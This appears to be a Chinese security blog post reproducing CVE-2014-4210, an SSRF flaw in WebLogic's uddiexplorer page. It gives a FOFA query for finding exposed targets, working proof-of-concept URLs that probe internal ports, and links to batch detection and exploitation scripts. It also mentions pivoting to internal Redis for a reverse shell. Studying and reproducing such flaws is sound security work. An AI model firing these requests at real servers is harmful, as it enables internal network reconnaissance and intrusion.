CVE-2014-4210 Weblogic SSRF漏洞复现

admin 2022年6月26日23:30:31安全文章评论38 views1012字阅读3分22秒阅读模式

漏洞环境

FOFAapp="Weblogic_interface_7001"

影响范围

10.0.2.0, 10.3.6.0

漏洞危害

探测内网存活的ip和端口,探测内网系统中存在的文件,如果内网有IP开启redis服务,我们就可以用存在ssrf的服务器给含有redis服务的服务器发送命令,然后反弹shell,有些ssrf还可以利用file协议对目标机本地的文件进行读取。

漏洞复现

访问

http://1.1.1.1:8001/uddiexplorer/SearchPublicRegistries.jsp

CVE-2014-4210 Weblogic SSRF漏洞复现

探测此ip存在的内网ip

CVE-2014-4210 Weblogic SSRF漏洞复现

poc

探测此ip存活端口

http://1.1.1.1:8001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:8001

CVE-2014-4210 Weblogic SSRF漏洞复现

此返回状态说明8001端口是开放的

http://1.1.1.1:8001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

CVE-2014-4210 Weblogic SSRF漏洞复现

此返回状态说明7001端口是关闭的

批量检测脚本

链接:https://pan.baidu.com/s/1OUcKcm-wBONMoC20AysCEw 提取码:9slm

下载脚本成功后,同目录下新建文件domain.txt内容格式如下,然后运行脚本即可

CVE-2014-4210 Weblogic SSRF漏洞复现

利用脚本

链接:https://pan.baidu.com/s/1K5zRzD2AtWIvIicTGUhJ4Q 提取码:9trc

下载完脚本之后有两处需要修改的地方

CVE-2014-4210 Weblogic SSRF漏洞复现

第一处:url改为你发现存在SSRFurl

第二处:ip地址这个是探测内网一个网段的可从上面信息搜集得到的ip段信息进行修改

另外如果要修改想要探测的端口直接在脚本里面修改即可

CVE-2014-4210 Weblogic SSRF漏洞复现

原文始发于微信公众号(赛瑞攻防实验室):CVE-2014-4210 Weblogic SSRF漏洞复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月26日23:30:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CVE-2014-4210 Weblogic SSRF漏洞复现 http://cn-sec.com/archives/886727.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: